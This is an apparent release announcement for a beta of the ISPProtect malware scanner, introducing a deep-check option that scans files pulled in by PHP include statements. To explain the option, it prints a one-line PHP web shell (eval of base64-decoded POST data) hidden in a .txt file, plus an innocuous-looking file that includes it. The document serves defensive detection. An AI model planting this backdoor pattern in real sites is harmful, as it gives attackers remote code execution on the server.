Today we have released the beta version 1.30.0 of the ISPProtect Malware Scanner.
To update your ISPProtect instance to the beta version, use ispp_scan --update --channel=beta. Be aware that this beta version might still contain bugs.
Deep scan
Some attackers do not embed their malware into existing or new php files. Instead they are using files with non-PHP extensions like .txt and then included into PHP files using require() / include() etc. This makes it harder to recognize as during malware research the admins often look into PHP files and might overlook the suspect includes.
The new version of ISPProtect has a scan argument --deep-check. This argument enables ISPProtect to search for include/require statements in PHP files and then searches for those included files to scan them, too.
Let's have a look at an example.
Malware example
Here we have a file called "database.txt" that contains the malicious code:
<?php eval(base64_decode($_POST['mypost']));
This file is normally not executed by the PHP interpreter and can do no harm by itself, but now imagine the following PHP file:
<?php
/* some real harmless code here */
define('PTH', realpath(dirname(__FILE__)));
include PTH . "/" . "database.txt";
This makes the database.txt file everything but harmless. The Code includes the .txt file contents and interprets it as PHP code and such allows the attacker to execute any command he wants.
Of course, the new version also contains new malware and false positive signatures.
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.